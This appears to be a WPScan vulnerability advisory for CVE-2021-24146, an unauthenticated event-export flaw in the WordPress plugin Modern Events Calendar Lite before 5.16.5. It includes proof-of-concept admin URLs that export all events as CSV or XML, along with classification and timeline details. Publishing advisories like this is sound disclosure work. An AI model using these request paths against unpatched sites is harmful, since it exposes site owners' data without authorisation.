logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export

Description

The plugin did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.

Proof of Concept

https://drive.google.com/file/d/1lLEXDyPp4LcKoCOqYS7A-0Yg_pIQD-ND/view?usp=sharing

/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml

Affects Plugins

modern-events-calendar-lite

Fixed in version 5.16.5

References

CVE

CVE-2021-24146

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website

http://research.sun-asterisk.com/

Verified

Yes

WPVDB ID

c7b1ebd6-3050-4725-9c87-0ea525f8fecc

Timeline

Publicly Published

2021-01-29 (about 7 months ago)

Added

2021-01-29 (about 7 months ago)

Last Updated

2021-01-31 (about 7 months ago)

Our Other Services

WPScan WordPress Security Plugin